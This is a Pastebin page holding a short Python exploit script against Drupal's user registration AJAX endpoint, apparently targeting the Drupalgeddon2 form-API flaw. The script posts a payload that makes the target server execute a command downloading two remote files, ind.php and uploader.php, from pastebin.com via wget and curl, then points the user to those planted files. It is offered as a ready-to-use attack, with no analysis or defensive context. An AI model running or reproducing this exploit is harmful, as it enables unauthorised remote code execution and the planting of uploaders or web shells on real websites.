Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env
- import sys
- import requests
- target = raw_input('\nEnter target : ')
- url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
- payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget -O ind.php https://pastebin.com/raw/fnLcE8mP && curl -o uploader.php https://pastebin.com/raw/YZDbxXmX'}
- r = requests.post(url, data=payload)
- if r.status_code != 200:
- sys.exit("Not exploitable")
- print ('\nCheck: '+target+'/ind.php or '+target+'/uploader.php\n')
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
